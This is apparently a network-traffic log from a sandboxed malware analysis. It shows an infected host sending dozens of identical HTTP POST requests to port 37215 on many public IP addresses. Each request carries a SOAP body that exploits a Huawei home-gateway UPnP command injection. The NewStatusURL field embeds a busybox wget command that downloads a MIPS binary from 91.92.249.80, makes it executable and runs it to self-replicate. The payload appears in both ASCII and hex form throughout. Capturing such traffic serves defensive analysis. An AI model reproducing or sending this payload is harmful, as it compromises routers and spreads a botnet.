                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          804192.168.2.2359344157.14.189.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237128973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          805192.168.2.2333460178.131.157.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237138033 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          806192.168.2.236087841.162.145.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237195969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          807192.168.2.233648641.90.29.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.237221003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          808192.168.2.2341150156.160.22.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.238164902 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          809192.168.2.234123841.100.73.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239159107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          810192.168.2.2348438197.95.255.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239162922 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          811192.168.2.2359030157.224.241.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239192963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          812192.168.2.2334192197.192.20.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239284039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          813192.168.2.2337028157.220.221.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.239320040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
